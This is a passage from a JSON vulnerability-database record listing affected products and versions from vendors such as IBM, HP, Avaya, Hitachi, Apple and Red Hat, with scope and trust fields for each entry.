"6.3" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.1" }, { "model": "one-x client enablement service sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0" }, { "model": "nonstop server j06.12.00", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "cosminexus developer light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "tivoli system automation for multiplatforms", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.2" }, { "model": "tivoli system automation for integrated operations management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "websphere extreme scale", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "nonstop server j06.05.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.4" }, { "model": "nonstop server j06.08.00", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server j06.09.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "cosminexus studio", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "4.0" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "cosminexus", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "8.0" }, { "model": "nonstop server j06.16", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "websphere operational decision management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.0" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "nonstop server j6.0.14.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "rational host on-demand", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.0.7" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux desktop supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "nsmexpress", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "java sdk", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "tivoli application dependency discovery manager", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.2.1.5" }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "010" }, { "model": "network and security manager software 2012.2r9", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "enterprise linux supplementary server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.1" }, { "model": "rational host on-demand", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "11.0.8" }, { "model": "ucosminexus service architect", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2" }, { "model": "jdk 1.5.0 11", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "websphere cast iron cloud integration live saas offeri", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.2" }, { "model": "ucosminexus developer light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "56009.7" }, { "model": "cosminexus server standard edition", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "4" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.4" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "nonstop server j06.07.02", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "nonstop server j06.09.00", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "jdk 1.5.0.0 04", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.2" }, { "model": "enterprise linux desktop client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "nonstop server j06.10.02", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server j06.06.00", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "network and security manager software r7", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "maximo asset management essentials", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.3" }, { "model": "aura communication manager utility services sp", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.16.1.0.9.8" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.6" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.4" }, { "model": "nonstop server h06.24.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2" }, { "model": "jdk 1.5.0.0 06", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "nonstop server h06.25", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.4.0.15" }, { "model": "one-x client enablement service sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.1" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "websphere ilog jrules", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "ucosminexus application server light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "nonstop server h06.15.00", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "cosminexus application server standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.1" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1.4" }, { "model": "uploader", "scope": "eq", "trust": 0.3, "vendor": "wordpress", "version": "1.0" }, { "model": "websphere cast iron cloud integration virtual applianc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0" }, { "model": "cosminexus developer professional", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "12.2" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2" }, { "model": "jre 1.5.0 09", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "linux enterprise server for vmware sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "linux enterprise server sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.2" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.4" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.6.5" }, { "model": "hp-ux b.11.11", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "tivoli remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.2" }, { "model": "websphere cast iron cloud integration virtual applianc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3" }, { "model": "websphere cast iron cloud integration physical applian", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0" }, { "model": "nonstop server j06.07.00", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "jre beta", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5.0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.6" }, { "model": "linux enterprise server for vmware sp2", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.5.0.15" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.1" }, { "model": "tivoli system automation application manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "jdk", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "nonstop server j06.08.04", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server j06.08.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "cosminexus developer standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "enterprise server x86 64", "scope": "eq", "trust": 0.3, "vendor": "mandrakesoft", "version": "5" }, { "model": "jdk 07", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "java sdk", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "nonstop server h06.24", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server h06.15.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "cosminexus application server enterprise", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.2" }, { "model": "cosminexus application server", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5.0" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.6.3" }, { "model": "nonstop server h06.16.00", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "ucosminexus developer professional for plug-in", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0" }, { "model": "nonstop server h06.18.02", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server h06.20.03", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.0" }, { "model": "enterprise linux hpc node optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "websphere extreme scale", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "network and security manager software r2", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.6.6" }, { "model": "intelligent operations center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5" }, { "model": "enterprise linux server supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.8.3" }, { "model": "tivoli endpoint manager for remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.2" }, { "model": "network and security manager software r5", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.3" }, { "model": "nonstop server j06.13.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server h06.23", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "tivoli system automation for integrated operations management", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2.1.1.4" }, { "model": "enterprise server", "scope": "eq", "trust": 0.3, "vendor": "mandrakesoft", "version": "5" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.9.3" }, { "model": "websphere extreme scale", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "jdk 1.5.0 11-b03", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.3" }, { "model": "nonstop server h06.19.02", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2" }, { "model": "virtualization engine ts7700", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "tivoli system automation for multiplatforms", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.6.5" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.5" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1x8664" }, { "model": "websphere extreme scale", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "nonstop server", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6" }, { "model": "websphere message broker", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0" }, { "model": "tivoli system automation application manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.3" }, { "model": "network and security manager software r8", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.3" }, { "model": "enterprise linux workstation supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "nonstop server h06.22.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8" }, { "model": "enterprise linux workstation optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "websphere cast iron cloud integration live saas offeri", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "network and security manager software r4", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.1" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "operational decision manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.3" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.2" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.1" }, { "model": "nonstop server h06.19.03", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "cosminexus studio", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.6.3" }, { "model": "websphere message broker", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2" }, { "model": "maximo asset management essentials", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.6.6" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.6.7" }, { "model": "cosminexus", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.0" }, { "model": "websphere message broker", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "nonstop server j06.11.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.1" }, { "model": "nonstop server j06.15", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "ucosminexus developer professional", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0" }, { "model": "aura experience portal sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "ucosminexus developer standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0" }, { "model": "nonstop server h06.21.02", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.6.8" }, { "model": "nonstop server h06.20.00", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "cosminexus", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "9.0" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.6.4" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.3" }, { "model": "tivoli system automation application manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.1" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.8" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.3" }, { "model": "hp-ux b.11.31", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.1" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "cosminexus client", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.1" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.4" }, { "model": "nonstop server j06.05.02", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "jre 07", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "nonstop server j06.07.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server h06.21.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server h06.19.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.13" }, { "model": "jdk 0 09", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "tivoli provisioning manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1" }, { "model": "jre 1.5.0 08", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.4" }, { "model": "websphere cast iron cloud integration studio", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.7" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.2" }, { "model": "ucosminexus application server smart edition", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0" }, { "model": "aura conferencing", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.6.7" }, { "model": "tivoli system automation for multiplatforms", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "nonstop server j06.11.00", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "nonstop server h06.26.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "5" }, { "model": "linux enterprise java sp2", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "enterprise linux server optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.2" }, { "model": "websphere cast iron cloud integration physical applian", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "nonstop server j06.04.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "websphere cast iron cloud integration studio", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.3" }, { "model": "aura conferencing sp1 standard", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "nonstop server j06.04.00", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.6.2" }, { "model": "nonstop server j06.06.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.1" }, { "model": "one-x client enablement service sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.6.8" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.6.4" }, { "model": "nonstop server h06.21.00", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.5" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.3" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1.0.9" }, { "model": "tivoli provisioning manager for software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "java se", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "nonstop server j06.06.03", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.4" }, { "model": "nonstop server h06.17.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "jdk 1.5.0 07-b03", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "network and security manager software r6", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.6.1" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "aura experience portal sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "operational decision manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2" }, { "model": "junos space 13.3r1.8", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "aura system platform sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.5" }, { "model": "jdk 1.6.0 01-b06", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "nonstop server h06.20.01", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0" }, { "model": "aura system platform sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "6" }, { "model": "nonstop server j06.10.00", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "tivoli system automation application manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.2" }, { "model": "enterprise linux desktop optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "nonstop server h06.17.03", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "tivoli provisioning manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1.1" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0" }, { "model": "enterprise linux hpc node supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux desktop supplementary client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "ucosminexus application server standard-r", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0" }, { "model": "linux", "scope": null, "trust": 0.3, "vendor": "gentoo", "version": null }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "nonstop server h06.16.02", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "jdk 1.5.0.0 03", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.0.9.8" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.6.2" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "nonstop server j06.05.00", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7" }, { "model": "linux enterprise java sp4", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.5" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.2" }, { "model": "rational host on-demand", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.0" }, { "model": "nonstop server h06.20.02", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "tivoli provisioning manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": 